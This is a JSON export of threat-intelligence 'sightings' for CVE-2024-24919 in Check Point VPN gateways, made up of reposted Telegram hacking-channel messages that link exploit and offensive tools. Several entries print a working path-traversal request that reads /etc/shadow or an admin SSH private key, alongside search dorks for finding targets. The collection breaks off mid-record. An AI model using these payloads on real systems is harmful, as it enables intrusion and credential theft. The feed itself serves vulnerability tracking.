-Phone Hunter -CCTV Hunter -Deface -Mass Deface -Deface Maker -Bypass Maker -Auto Bypasser -Database Dump -Dorking -Admin Finder -Wifi Jammer -Executor -Simple Dirber -Trojan Maker -Mass Dork -Doxing / Osint \n\nhttps://github.com/MrSanZz/pandora\n\nSploitScan is a sophisticated cybersecurity utility designed to provide detailed information on vulnerabilities and associated exploits. \n\nhttps://github.com/xaitax/SploitScan\n\nProgress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800) \n\nhttps://github.com/sinsinology/CVE-2024-4358\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nNew release of OneDriveExplorer. Mainly fixes for null value errors\n\nhttps://github.com/Beercow/OneDriveExplorer/releases/tag/v2024.05.17\n\nDLLirant is a tool to automatize the DLL Hijacking researches on a specified binary. \n\nhttps://github.com/redteamsocietegenerale/DLLirant\n\nAD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses \n\nhttps://github.com/Mazars-Tech/AD_Miner\n\n#HackersFactory", "creation_timestamp": "2024-06-07T11:02:07.000000Z"}, {"uuid": "eb512c2f-631a-4b90-9696-7cee2317b5ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7873", "content": "For this vulnerability, just type shodan \n\ntitle:\"Check Point\" ssl:\"target\"\n\nCVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nhost: target\nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#SSLVPN  #BugBounty", "creation_timestamp": "2024-06-02T14:50:02.000000Z"}, {"uuid": "77a884da-6f2b-4c25-b986-acc9bcfe4b49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7870", "content": "Tools - Hackers Factory\n\nGraphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint. \n\nhttps://github.com/dolevf/graphw00f\n\nSecurity Auditor Utility for GraphQL APIs \n\nhttps://github.com/dolevf/graphql-cop\n\nA toolkit for testing, tweaking and cracking JSON Web Tokens \n\nhttps://github.com/ticarpi/jwt_tool\n\nSearch Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. \n\nhttps://github.com/Zarcolio/sitedorks\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities. \n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nThis checklist may help you to have a good methodology for bug bounty hunting\n\nhttps://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md\n\nJS Fuzzing - LazyEgg\n\nhttps://github.com/schooldropout1337/lazyegg/?s=08\n\nCheck point: CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nBurp Extension to find potential endpoints, parameters, and generate a custom target wordlist \n\nhttps://github.com/xnl-h4ck3r/GAP-Burp-Extension\n\nLive Feed of C2 servers, tools, and botnets \n\nhttps://github.com/montysecurity/C2-Tracker\n\n#HackersFactory", "creation_timestamp": "2024-06-02T06:50:08.000000Z"}, {"uuid": "0832e500-9e3d-45ce-b0ce-298fe52c7782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/37HyDNEmJppEzKPIqf-JVmXSbFQBVjgzg01Xx4apZfoASS8", "content": "", "creation_timestamp": "2025-02-20T13:27:13.000000Z"}, {"uuid": "39da665e-3d64-4a44-bf68-37f6bdb67f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/NinjaSec/28351", "content": "\ud83d\udd27 CVE Exploitation Tools (2024\u20132025)\n\n1. CVE-2024-25600 \u2013 WordPress Bricks Builder RCE\n\n2. CVE-2024-24919 \u2013 Check Point Security Gateway RCE\n\n3. CVE-2024-29025 \u2013 Netty HttpPostRequestDecoder DoS\n\n4. CVE-2024-21525 \u2013 node-twain Buffer Overflow\n\n5. CVE-2024-3094 \u2013 XZ Backdoor Detector\n\n6. CVE-2024-21515 \u2013 OpenCart Reflected XSS\n\n7. CVE-2024-21552 \u2013 SuperAGI Arbitrary Code Execution\n\n8. CVE-2024-56249 \u2013 WordPress WPMasterToolKit Arbitrary File Upload\n\n9. CVE-2024-24919 \u2013 Check Point VPN Exploit\n\n10. CVE-2024-24919 \u2013 Python Exploit Script\n\nPython script to exploit CVE-2024-24919 vulnerability.\n\nGitHub: LucasKatashi/CVE-2024-24919\n\n11. CVE-2024-24919 \u2013 Exploit PoC\n\nProof-of-Concept for exploiting CVE-2024-24919.\n\nGitHub: seed1337/CVE-2024-24919-POC\n\n12. CVE-2024-24919 \u2013 Check Point Remote Access VPN Exploit\n\nScripts to exploit CVE-2024-24919 in Check Point VPNs.\n\nGitHub: Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN\n\n13. CVE-2024-25600 \u2013 Alternate Exploit Script\n\nAnother implementation to exploit Bricks Builder RCE.\n\nGitHub: meli0dasH4ck3r/cve-2024-25600\n\n14. CVE-2024-25600 \u2013 Exploit Script\n\nPython script to exploit Bricks Builder RCE vulnerability.\n\nGitHub: K3ysTr0K3R/CVE-2024-25600-EXPLOIT \n\n\n\ud83d\udd27 CVE Exploitation Tools &amp; Frameworks\n\n1. trickest/cve\n\n\ud83d\udd17 https://github.com/trickest/cve\n\n2. PayloadsAllTheThings \u2013 CVE Exploits\n\n\ud83d\udd17 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/README.md\n\n3. qazbnm456/awesome-cve-poc\n\n\ud83d\udd17 https://github.com/qazbnm456/awesome-cve-poc\n\n4. intel/cve-bin-tool\n\n\ud83d\udd17 https://github.com/intel/cve-bin-tool\n\n5. cve-search/cve-search\nN\n\n\ud83d\udd17 https://github.com/cve-search/cve-search\n\n6. vertoforce/CVE-Enrichment\n\n\ud83d\udd17 https://github.com/vertoforce/CVE-Enrichment\n\n7. TURROKS/CVE_Prioritizer\n\n\ud83d\udd17 https://github.com/TURROKS/CVE_Prioritizer\n\n8. clearlinux/cve-check-tool\n\n\ud83d\udd17 https://github.com/clearlinux/cve-check-tool\n\n9. cddmp/cvecheck\n\n\ud83d\udd17 https://github.com/cddmp/cvecheck\n\n10. center-for-threat-informed-defense/attack_to_cve\n\nMaps MITRE ATT&amp;CK techniques to CVEs to characterize vulnerability impacts.\n\n\ud83d\udd17 https://github.com/center-for-threat-informed-defense/attack_to_cve\n\n\n\ud83e\uddea Specific CVE Exploit Tools\n\n11. CVE-2024-25600 Exploit Tool\n\nDesigned to exploit a vulnerability in the Bricks Builder plugin for WordPress.\n\n\ud83d\udd17 https://github.com/Chocapikk/CVE-2024-25600\n\n12. RevoltSecurities/CVE-2024-24919\n\nTool to detect and exploit CVE-2024-24919 vulnerability.\n\n\ud83d\udd17 https://github.com/RevoltSecurities/CVE-2024-24919\n\n13. ROCA Detection Tool\n\nDetects RSA keys vulnerable to the ROCA vulnerability (CVE-2017-15361).\n\n\ud83d\udd17 https://github.com/crocs-muni/roca\n\n\ud83d\udee0\ufe0f Additional Tools &amp; Resources\n\n14. Goby\n\nA network security assessment tool that can scan for vulnerabilities and map attack surfaces.\n\n\ud83d\udd17 https://github.com/gobysec/Goby\n\n15. awesome-pentestu\n\nA curated list of penetration testing resources, including tools for CVE exploitation.\n\n\ud83d\udd17 https://github.com/enaqx/awesome-pentest\n\n16. awesome-bugbounty-tools\n\nA collection of tools useful for bug bounty hunting, some of which relate to CVE exploitation.\n\n\ud83d\udd17 https://github.com/vavkamil/awesome-bugbounty-tools\n\n17. cyberguideme/Tools\n\nA repository of various cybersecurity tools, including those for exploiting known vulnerabilities.\n\n\ud83d\udd17 https://github.com/cyberguideme/Tools\n\n\n#GrayHats", "creation_timestamp": "2025-04-18T21:33:21.000000Z"}, {"uuid": "b6e2c3c2-51d3-4137-91b1-fde21d07fb93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/BABATATASASA/7290", "content": "How to find Linux vulnerability | Exploit POC of CVE-2024-24919 | #cve-2024-24919-YOUTUBE\u6cb9\u7ba1\u65e0\u6c34\u5370\u89c6\u9891\u89e3\u6790\u2014\u20146li6\u5728\u7ebf\u5de5\u5177\u7bb1\nhttps://6li6.com/youtube/view-3584", "creation_timestamp": "2024-12-11T15:27:36.000000Z"}, {"uuid": "1e876b96-cc36-403b-9692-2c914ab7348d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21810", "content": "Tools - Hackers Factory\n\nGourlex \n\nIt is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.\n\nTry the tool :\u00a0 https://github.com/trap-bytes/gourlex\n\nFind xss with this automation of the following work :\n\n1. subfinder -d indeed.com -o indeed.txt //Find Subdomains\n2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains\n3. echo \"indeed.com\" | gau --threads 5 &gt;&gt; Enpoints.txt // Find Endpoints\n4. cat httpx.txt | katana -jc &gt;&gt; Enpoints.txt // Find More Endpoints\n5. cat Enpoints.txt | uro &gt;&gt; Endpoints_F.txt // Remove Duplicates\n6. cat Endpoints_F.txt | gf xss &gt;&gt; XSS.txt // Filter Endpoints for XSS\n7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters\n8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS\n\nScript : https://github.com/dirtycoder0124/xss\n\nA simple powershell script that can run in powershell for linux. The purpose of the script is to identify potential privilege escalation vulnerabilities on Linux systems that run with PowerShell\n\nhttps://github.com/tjnull/pentest-arsenal/tree/main/Cadiclus\n\nInQL makes mapping out a GraphQL API easy! It also includes several automated vulnerability checks!\u00a0 \n\ngithub.com/doyensec/inql\n\nA Microservices-based framework for the study of Network Security and Penetration Test techniques \n\nhttps://github.com/DockerSecurityPlayground/DSP\n\nSnaffler reimplementation in Python -\n\nhttps://github.com/SnaffCon/Snaffler\nhttps://github.com/asmtlab/snafflepy\n\nCVE-2024-24919 \n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nExtract endpoints from APK files \n\nhttps://github.com/ndelphit/apkurlgrep\n\n#HackersFactory", "creation_timestamp": "2024-06-03T09:14:28.000000Z"}, {"uuid": "7c9e910f-6aed-40e3-8feb-74df6d671120", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21791", "content": "Tools - Hackers Factory\n\nGraphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint. \n\nhttps://github.com/dolevf/graphw00f\n\nSecurity Auditor Utility for GraphQL APIs \n\nhttps://github.com/dolevf/graphql-cop\n\nA toolkit for testing, tweaking and cracking JSON Web Tokens \n\nhttps://github.com/ticarpi/jwt_tool\n\nSearch Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. \n\nhttps://github.com/Zarcolio/sitedorks\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities. \n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nThis checklist may help you to have a good methodology for bug bounty hunting\n\nhttps://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md\n\nJS Fuzzing - LazyEgg\n\nhttps://github.com/schooldropout1337/lazyegg/?s=08\n\nCheck point: CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nBurp Extension to find potential endpoints, parameters, and generate a custom target wordlist \n\nhttps://github.com/xnl-h4ck3r/GAP-Burp-Extension\n\nLive Feed of C2 servers, tools, and botnets \n\nhttps://github.com/montysecurity/C2-Tracker\n\n#HackersFactory", "creation_timestamp": "2024-07-25T13:41:32.000000Z"}, {"uuid": "a00fd51a-5bba-478e-9452-b0e0c628954b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3267", "content": "Tools - Hackers Factory\n\nGourlex \n\nIt is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.\n\nTry the tool :\u00a0 https://github.com/trap-bytes/gourlex\n\nFind xss with this automation of the following work :\n\n1. subfinder -d indeed.com -o indeed.txt //Find Subdomains\n2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains\n3. echo \"indeed.com\" | gau --threads 5 &gt;&gt; Enpoints.txt // Find Endpoints\n4. cat httpx.txt | katana -jc &gt;&gt; Enpoints.txt // Find More Endpoints\n5. cat Enpoints.txt | uro &gt;&gt; Endpoints_F.txt // Remove Duplicates\n6. cat Endpoints_F.txt | gf xss &gt;&gt; XSS.txt // Filter Endpoints for XSS\n7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters\n8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS\n\nScript : https://github.com/dirtycoder0124/xss\n\nA simple powershell script that can run in powershell for linux. The purpose of the script is to identify potential privilege escalation vulnerabilities on Linux systems that run with PowerShell\n\nhttps://github.com/tjnull/pentest-arsenal/tree/main/Cadiclus\n\nInQL makes mapping out a GraphQL API easy! It also includes several automated vulnerability checks!\u00a0 \n\ngithub.com/doyensec/inql\n\nA Microservices-based framework for the study of Network Security and Penetration Test techniques \n\nhttps://github.com/DockerSecurityPlayground/DSP\n\nSnaffler reimplementation in Python -\n\nhttps://github.com/SnaffCon/Snaffler\nhttps://github.com/asmtlab/snafflepy\n\nCVE-2024-24919 \n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nExtract endpoints from APK files \n\nhttps://github.com/ndelphit/apkurlgrep\n\n#HackersFactory", "creation_timestamp": "2024-06-03T09:13:35.000000Z"}, {"uuid": "2081899d-a519-46ee-bd01-2753deabecbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3266", "content": "Tools - Hackers Factory\n\nGraphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint. \n\nhttps://github.com/dolevf/graphw00f\n\nSecurity Auditor Utility for GraphQL APIs \n\nhttps://github.com/dolevf/graphql-cop\n\nA toolkit for testing, tweaking and cracking JSON Web Tokens \n\nhttps://github.com/ticarpi/jwt_tool\n\nSearch Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. \n\nhttps://github.com/Zarcolio/sitedorks\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities. \n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nThis checklist may help you to have a good methodology for bug bounty hunting\n\nhttps://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md\n\nJS Fuzzing - LazyEgg\n\nhttps://github.com/schooldropout1337/lazyegg/?s=08\n\nCheck point: CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nBurp Extension to find potential endpoints, parameters, and generate a custom target wordlist \n\nhttps://github.com/xnl-h4ck3r/GAP-Burp-Extension\n\nLive Feed of C2 servers, tools, and botnets \n\nhttps://github.com/montysecurity/C2-Tracker\n\n#HackersFactory", "creation_timestamp": "2024-06-02T06:49:29.000000Z"}, {"uuid": "6886f032-f455-4c5b-ab71-5850b87c6185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3289", "content": "Tools - Hackers Factory\n\nVATINT (Vehicle and Transportation Intelligence) Tools \n\nOnline services for search by VIN or License Plates numbers in different countries;\nStolen car database (Europe);\nContainer and ships tracking;\nFlights, trains, drones tracking\n\nand much more.\n\nhttps://github.com/CScorza/Tool-VATINT\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nand more.\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nSUBPROBER\n\nA simple tool for scanning a list of websites. Allows you to collect a lot of data - IP address, status code,\u00a0 title, response length, content type, redirect info etc.\n\nhttps://github.com/RevoltSecurities/SubProber\n\nAdvanced Search Tools\n\n- regional search engines\n- privacy search engines\n- search engines dorking\n- fact checking tools\n- database search tools\n\nand more.\n\nhttps://start.me/p/nRADzL/advanced-search-tools\n\nGitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC\n\n10 years of the GitHub Security Bug Bounty Program\n\nhttps://github.blog/2024-06-11-10-years-of-the-github-security-bug-bounty-program/\n\nThis page lists all the available scanning profiles shipped with Rainmap Lite.\n\nhttps://github.com/cldrn/rainmap-lite/wiki/Scanning-profiles\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.\n\nhttps://github.com/danielmiessler/SecLists\n\nOnion addresses for anything. \n\nhttps://github.com/cmars/onionpipe\n\nOneDorkForAll/dorks/1M_dork at main \u00b7 HackShiv/OneDorkForAll \u00b7 GitHub\n\nhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork\n\nPoC for using MS Windows printers for persistence / command and control via Internet Printing\nLicense\n\nhttps://github.com/Diverto/IPPrintC2\n\n#HackersFactory", "creation_timestamp": "2024-06-17T10:45:18.000000Z"}, {"uuid": "99c7f506-aa4f-4d82-9540-45f56e0f4c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2105", "content": "CVE-2024-24919 Check Point Remote Access VPN 0-Day\n\u041d\u0443 \u0438\u043b\u0438 \u0442\u0430\u043a \ud83d\udc4c\naCSHELL/../../../../../../../\nhome/admin/.ssh/id_rsa\n*\nssh admin@\u0425\u043e\u0441\u0442\u044a -i id_rsa\n\n#shitPointVPN #0Day", "creation_timestamp": "2024-05-30T13:42:14.000000Z"}, {"uuid": "73732a13-8d8b-4fd9-92ac-0db90244cab3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3273", "content": "Tools - Hackers Factory\n\nThis tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. \n\nhttps://github.com/xaitax/TotalRecall\n\nAn Event Tracing for Windows (ETW) tool that allows you to enumerate Manifest &amp; MOF providers, as well as collect events from desired providers.\n\nhttps://github.com/jsecurity101/ETWInspector\n\nSearch and browse documents and data; find the people and companies you look for. \n\nhttps://github.com/alephdata/aleph\n\nDDoS -Web Scanning -Phone Hunter -CCTV Hunter -Deface -Mass Deface -Deface Maker -Bypass Maker -Auto Bypasser -Database Dump -Dorking -Admin Finder -Wifi Jammer -Executor -Simple Dirber -Trojan Maker -Mass Dork -Doxing / Osint \n\nhttps://github.com/MrSanZz/pandora\n\nSploitScan is a sophisticated cybersecurity utility designed to provide detailed information on vulnerabilities and associated exploits. \n\nhttps://github.com/xaitax/SploitScan\n\nProgress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800) \n\nhttps://github.com/sinsinology/CVE-2024-4358\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nNew release of OneDriveExplorer. Mainly fixes for null value errors\n\nhttps://github.com/Beercow/OneDriveExplorer/releases/tag/v2024.05.17\n\nDLLirant is a tool to automatize the DLL Hijacking researches on a specified binary. \n\nhttps://github.com/redteamsocietegenerale/DLLirant\n\nAD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses \n\nhttps://github.com/Mazars-Tech/AD_Miner\n\n#HackersFactory", "creation_timestamp": "2024-06-11T23:15:39.000000Z"}, {"uuid": "2b1d209d-c4db-4df8-aec4-9bbeddb8f4a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/eRxNUKeZBbOHeMFO52e15mbiixlsbaE7HPCfeGLtqJv8iOw", "content": "", "creation_timestamp": "2024-06-01T13:08:19.000000Z"}, {"uuid": "3152e8d2-b08d-4beb-9be4-c052d0cf2418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/6NdLlmq3M6MeH1GAnhLGIiA7DZcxbnDHO5X9Dqnw0GfyCo8", "content": "", "creation_timestamp": "2024-06-05T10:28:05.000000Z"}, {"uuid": "fb34d345-a783-49ae-a444-f5e61c3384b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/RAT070/2134", "content": "CVE-2024-24919:  Check Point arbitrary file read (as root) \n\n Blog: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/\n\n#cve #pentest #redteam", "creation_timestamp": "2024-06-03T08:40:29.000000Z"}, {"uuid": "88612baa-8b82-4559-a780-c5918afd5ae5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/361", "content": "https://github.com/c3rrberu5/CVE-2024-24919\n\nNuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.\n\n#github exploit", "creation_timestamp": "2024-05-30T14:54:10.000000Z"}, {"uuid": "7306e3f9-6fbe-4dae-8f47-344fb0869789", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/360", "content": "CVE-2024-24919\n*\nCheck Point Remote Access VPN 0-Day\n*\nFOFA link\n*\nPOC:\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#0day #checkpoint", "creation_timestamp": "2024-05-30T11:05:19.000000Z"}, {"uuid": "672d4518-847a-4ffc-9693-5be2c1abf87c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2104", "content": "CVE-2024-24919\n*\nCheck Point Remote Access VPN 0-Day\n*\nFOFA link\n*\nPOC:\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#0day #checkpoint", "creation_timestamp": "2024-05-30T10:23:26.000000Z"}, {"uuid": "eb4a6e35-a5fd-4690-ac7c-d1845382d098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6657", "content": "For this vulnerability, just type shodan \n\ntitle:\"Check Point\" ssl:\"target\"\n\nCVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nhost: target\nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#SSLVPN  #BugBounty", "creation_timestamp": "2024-06-02T14:50:02.000000Z"}, {"uuid": "93b4adc2-3c82-4e20-ad52-1c6c691fe671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/h_HCswHOVhEnqLN2ArxOIyKJjjlmwLofTiVOfIms-PuAfM8", "content": "", "creation_timestamp": "2024-06-20T07:47:24.000000Z"}, {"uuid": "7d1c4e4d-ef51-4e51-8fa4-b259ae194bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "Telegram/RwmRPSvofKEbunlrvdLWwiAyjzAImmMB8fLukO7mSqH4c0k", "content": "", "creation_timestamp": "2024-06-01T10:19:41.000000Z"}, {"uuid": "8be3269f-d19e-4e62-9a47-da691451e118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/lcmysecteamch/8071", "content": "World Wide targets for CVE-2024-24919\n\n#checkpoint", "creation_timestamp": "2024-06-20T08:09:37.000000Z"}, {"uuid": "26e4ff42-4eb1-42b9-8c0a-9a6f755db407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/7910", "content": "CVE-2024-24919\n*\nCheck Point Remote Access VPN 0-Day\n*\nFOFA link\n*\nPOC:\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#0day #checkpoint", "creation_timestamp": "2024-05-30T10:29:40.000000Z"}, {"uuid": "180df18a-4dec-4a05-8a81-66483f21d8d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/CC0IOWAw_yTEU1xCVqWEGkayZSD3gfGfFLRLRWjl9b0Q_m4", "content": "", "creation_timestamp": "2024-06-30T17:08:30.000000Z"}, {"uuid": "6a1fd02a-0a09-422f-aeb6-1117bfd5d254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": 